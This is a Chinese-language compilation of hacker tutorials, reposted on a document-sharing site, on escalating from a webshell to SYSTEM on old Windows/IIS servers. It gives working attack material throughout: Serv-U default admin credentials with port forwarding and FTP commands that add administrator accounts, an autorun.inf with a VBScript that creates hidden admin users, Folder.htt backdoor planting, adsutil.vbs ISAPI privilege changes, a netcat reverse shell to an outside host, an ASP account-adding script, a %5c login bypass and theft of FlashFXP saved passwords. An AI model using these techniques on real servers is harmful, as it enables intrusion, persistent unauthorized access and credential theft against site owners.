当前位置:文档之家› 最全的WEBSHELL提权方法总结

最全的WEBSHELL提权方法总结

最全的WEBSHELL提权方法总结
最全的WEBSHELL提权方法总结

最全的WEBSHELL提权方法总结

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用

WEBSHELL权限提升技巧

c: d: e:.....

C:\Documents and Settings\All Users\「开始」菜单\程序\

看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆c:\Program Files\serv-u\

C:\WINNT\system32\config\

下它的SAM,破解密码

c:\winnt\system32\inetsrv\data\

是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行

c:\prel

C:\Program Files\Java Web Start\

c:\Documents and Settings\

C:\Documents and Settings\All Users\

c:\winnt\system32\inetsrv\data\

c:\Program Files\

c:\Program Files\serv-u\

C:\Program Files\Microsoft SQL Server\

c:\Temp\

c:\mysql\(如果服务器支持PHP)

c:\PHP(如果服务器支持PHP)

运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

还可以用这段代码试提升,好象不是很理想的

如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。

根目录下隐藏autorun.inf

C:\PROGRAM FILES\KV2004\ 绑

D:\PROGRAM FILES\RISING\RA V\

C:\Program Files\Real\RealServer\

rar

Folder.htt与desktop.ini

将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下

replace 替换法捆绑

脚本编写一个启动/关机脚本重起

删SAM :( 错

CAcls命令

FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak

Ring的权限提升21大法!

以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!

1.radmin连接法

条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。

2.paanywhere

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF

文件,在本地安装pcanywhere上去

3.SAM破解

C:\WINNT\system32\config\ 下他的SAM 破解之

4.SU密码夺取

C:\Documents and Settings\All Users\「开始」菜单\程序\

引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转

进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

[USER=WekweN|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYvalues=

这个用户具有最高权限,然后我们就可以ftp上去quote site exec xxx 来提升权限

5.c:\winnt\system32\inetsrv\data\

引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,

然后执行

6.SU溢出提权

这个网上教程N多不详细讲解了

7.运行Csript

引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提

升权限

用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

再将asp.dll加入特权一族

asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了8.脚本提权

c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs

9.VNC

这个是小花的文章HOHO

默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

我们可以用vncx4

破解它,vncx4使用很简单,只要在命令行下输入

c:\>vncx4 -W

然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

10.NC提权

给对方来个NC 但是条件是你要有足够的运行权限然后把它反弹到自己的电脑上HOHO OK了

11.社会工程学之GUEST提权

很简单查看他的拥护一般来说看到帐户以后密码尽量猜可能用户密码一样也可能是他QQ号邮

箱号手机号尽量看看HOHO

12.IPC空连接

如果对方真比较白痴的话扫他的IPC 如果运气好还是弱口令

13.替换服务

这个不用说了吧?个人感觉相当复杂

14.autorun .inf

autorun=xxx.exe 这个=后面自己写HOHO 加上只读、系统、隐藏属性传到哪个盘都可以的不相信

他不运行

15.desktop.ini与Folder.htt

引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义

文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后

我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:

ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名">

然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方

任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门

16.su覆盖提权

本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重

起一下Serv-U,于是你上面的所有配置都与他的一模一样了

17.SU转发端口

43958这个是Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令:Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将4444端口映射到43958端口上。然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了

18.SQL帐户密码泄露

如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。

引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass

中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可

以在CMD一栏中输入你想要的CMD命令了

19.asp.dll

引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同

)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去

了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到

C:\Inetpub\AdminScripts>这个目录下.

那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把

asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

20.Magic Winmail

前提是你要有个webshell 引用:https://www.doczj.com/doc/9e12200104.html,/forum/read.php?tid=3587这里去看吧

21.DBO……

其实提升权限的方式很多的就看大家怎么利用了HOHO 加油吧将服务器控制到底!

感谢noangel

WEBSHELL权限提升

动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容

OK,进入我的WEBSHELL

啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊

输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了

一serv-u提升

OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21

显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了

上传FPIPE,端口转发工具,图三

在运行CMD命令里输入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口

然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码都是字母)

确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录

接下来就是登陆了,登陆FTP一定要在CMD下登陆,

进入后一般命令和DOS一样,添加用户的时候

ftp>quote site exec net.exe user hk pass /add

ftp>quote site exec net.exe localgroup administrators hk/add

如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具

auto.ini 加SHELL.VBS

autorun.inf

[autorun]

open=shell.vbs

shell.vbs

dim wsh

set wsh=createObject("WScript.Shell")

wsh.run "net user guest /active:yes",0

wsh.run "net user guest 520ls",0

wsh.run "net localgroup administrators guest /add",0

wsh.run "net user hkbme 520ls /add",0

wsh.run "net localgroup administrators hkbme /add",0

wsh.run "cmd.exe /c del autorun.inf",0

wsh.run "cmd.exe /c del shell.vbs",0

但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序

Folder.htt与desktop.ini

将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个

Folder.htt添加代码

但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上

replace

替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点

格式

REPLACE [drive1:][path1]filename [drive2:][path2] [/A]

[/R] [/W]

REPLACE [drive1:][path1]filename [drive2:][path2]

[/R] [/S] [/W]

[drive1:][path1]filename 指定源文件。

[drive2:][path2] 指定要替换文件的

目录。

/A 把新文件加入目标目录。不能和

/S 或/U 命令行开关搭配使用。

/P 替换文件或加入源文件之前会先提示您

进行确认。

/R 替换只读文件以及未受保护的

文件。

/S 替换目标目录中所有子目录的文件。

不能与/A 命令选项

搭配使用。

/W 等您插入磁盘以后再运行。

/U 只会替换或更新比源文件日期早的文件。

不能与/A 命令行开关搭配使用

这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下

脚本

编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

[Startup]

0CmdLine=a.bat

0Parameters=

将文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"

A.BA T的内容可以是NET USER yonghu mima

也可以是NET USER ADMINistrator XXX

这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限

SAM

如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换

使用FlashFXP来提升权限最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞,动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提升权限的问题呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙招了。

其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。

其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问题吧。

其三,通过替换系统服务来提升。

其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。

本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:)

本人https://www.doczj.com/doc/9e12200104.html, 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版本的。郁闷啊!突然想起我将一个页面插入了asp 的后门,看看还有没有希望了。输https://www.doczj.com/doc/9e12200104.html,/xx.asp?id =1 好家伙,还在!高兴ing

图1

于是上传了一个asp的脚本的后门,怎么提升权限呢?

在这个网站的主机上游荡了N分钟,在C:\\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软

件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。

如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?

于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖乖发财了

对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp 权限。上传脚本木马~ 呵呵。

说了半天这提升权限的事情一点没讲啊

不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊!

又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。

现在的星号密码会不会也是加了密的?看看就行了呗。

怎么看? 菜鸟了吧手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较很显然在站点管理器中查看到的密码是明文显示的。发财了吧

下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵

密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+

用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69

(上述部分密码和用户名已经作了必要的修改)

这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到的。

我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。

--------------------------------------------------------------------------------

--

--

将asp权限提到最高by: cnqing from:https://www.doczj.com/doc/9e12200104.html,

本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。

原理:

asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system

方法:

第一步。

得到inprocesslsapiapps内容,用命令"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。

第二步

写一个bat内容为"cscript C:\\Inetpub\\AdminScripts\\ adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" ·····

省略号为复制下的内容。中间用空格分开不要带回车符

最后运行这个bat就行了。

例如:

我用"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"得到

"c:\\winnt\\system32\\inetsrv\\httpext.dll"

"c:\\winnt\\system32\\inetsrv\\httpodbc.dll"

"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"

"C:\\WINNT\\System32\\msw3prt.dll"

"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll"

"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll"

"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

那么你的bat就应该是:

cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" "c:\\winnt\\system32\\inetsrv\\httpext.dll" "c:\\winnt\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\System32\\msw3prt.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

已测试成功!!

--------------------------------------------------------------------------------

--

--

利用%5c绕过验证

利用%5c绕过验证

---------------------------------------

lake2(https://www.doczj.com/doc/9e12200104.html,)

2004-11-27

---------------------------------------

说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。

好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:https://www.doczj.com/doc/9e12200104.html,/index.php?ac...iew&bug_id=1429

N 年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是\\的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。

后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。

一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。

废话少说,看下面的代码:

<%

guest_user=trim(request("guest_user"))

guest_password=trim(request("guest_password"))

Set rs= Server.createObject("ADODB.Recordset")

sql="select * from admin where id=1"

rs.open sql,conn,3,2

readuser=rs("guest_user")

readpassword=rs("guest_password")

if readuser<>guest_user or readpassword<>guest_password then

response.write "请输入正确地管理员密码!"

response.end

else

session("admin")=1 \'登陆后写入seesion中保存

response.write("登陆成功,请返回信息页")

end if

%>

看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码:

<%

on error resume next

set conn=server.createobject("adodb.connection")

DBPath = Server.MapPath("guestbook.asp")

conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath

%>

啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了!

知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。

诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。

既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的"洞"网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段:

If Err Then

err.Clear

Set Conn = Nothing

Response.Write "数据库连接出错,请检查连接字串。"

Response.End

End If

数据库找不到程序就结束了,呵呵,空欢喜一场。

接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。我又不是BT,所以不去找事了,写篇文章,算是给各位高手提供资料吧。

总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^

--------------------------------------------------------------------------------

--

--

添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]

作者:蓝屏,凯文文章来源:冰点极限

其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators

组的用户了(虽然我不敢相信我的眼睛).

上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```

反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。.network对象脚本权限提升漏洞利用工具

用户:

密码:

<%@codepage=936

on error resume next

if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then

response.write "iP !s n0T RiGHt"

else

if request("username")<>"" then

username=request("username")

passwd=request("passwd")

Response.Expires=0

Session.TimeOut=50

Server.ScriptTimeout=3000

set lp=Server.createObject("https://www.doczj.com/doc/9e12200104.html,WORK")

oz="WinNT://"&https://www.doczj.com/doc/9e12200104.html,puterName

Set ob=GetObject(oz)

Set oe=GetObject(oz&"/Administrators,group")

Set od=ob.create("user",username)

od.SetPassword passwd

od.SetInfo

oe.Add oz&"/"&username

if err then

response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"

else

if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then

response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"

else

Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"

end if

end if

else

response.write "请输入输入用户名"

end if

end if

%>

如何绕过防火墙提升权限

本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。

废话少说,咱们进入正题。

首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell 不难。我们这次获得这个webshell,不是DVBBS,而是自由动力 3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp 是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe 上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。

测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。

思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a 那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm 里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。

传上了srv.exe和nc.exe在H:\\long\\sun***\\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D: \\Documents and Settings\\All Users\\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。

可以浏览D:\\program files\\serv-u\\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。

不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FA T32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost 的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\\,运行srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。

我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\\ long\\sun***\\lemon,再用刚才nc得到的shell把它们copy到d:\\winnt\\system32\\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。

一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\\program files\\serv-u\ \里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)

不管了,我们重启serv-u就ok 了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc 这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\\program files\\serv-u\\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。

好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:

ftp>quote site exec net user xr rain /add

在webshell上运行net user,就可以看见添加成功了。

整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit 可以做到的,但是我们觉得系统自带的服务才是最安全的后门。

--------------------------------------------------------------------------------

--

--

asp.dll解析成system提升权限

网络上传统的提升asp权限为系统的有两种:

1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system.

但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天

我要谈的关于adsutil.vbs提升权限.

2.用adsutil.vbs搞定.

在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法:

先举个例子:

有一群狗,这群狗里有几个长老级狗物,它们拥有着至高无上的权限,而其它的狗,他们的权限则少得可怜.

转到计算机上:

在IIS中,有几个Dll文件是拥有特权限的,我们可以理解为系统权限,就像长老级的狗.而解析asp的asp.dll 则就像一只

普通的狗,他的权限少得可怜.

那么,如果asp.dll也成了长老级的狗的话,那么asp不也就有了系统权限了吗,这是可以成立的.所以我们的思路也就是

把asp.dll加入特权的dll一族之中.提升步骤为:

<1>先查看有特权一话有哪些.

<2>加asp.dll加入特权一族

好了,下面我们就来实践这个过程.

1)查看有特权的dll文件:

命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps

得到显示为:

C:\\Inetpub\\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps

Microsoft (R) Windows 脚本宿主版本5.1 for Windows

版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps : (LIST) (5 Items)

"C:\\WINNT\\system32\\idq.dll"

"C:\\WINNT\\system32\\inetsrv\\httpext.dll"

"C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"

"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"

"C:\\WINNT\\system32\\msw3prt.dll"

看到没有,他说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

这几个文件,不同的机子,可能会不同.

2)把asp.dll加入特权一族:

因为asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定相同)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\ system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll"

"C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"

好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去

了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\\Inetpub\\AdminScripts>这个目录下.

那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

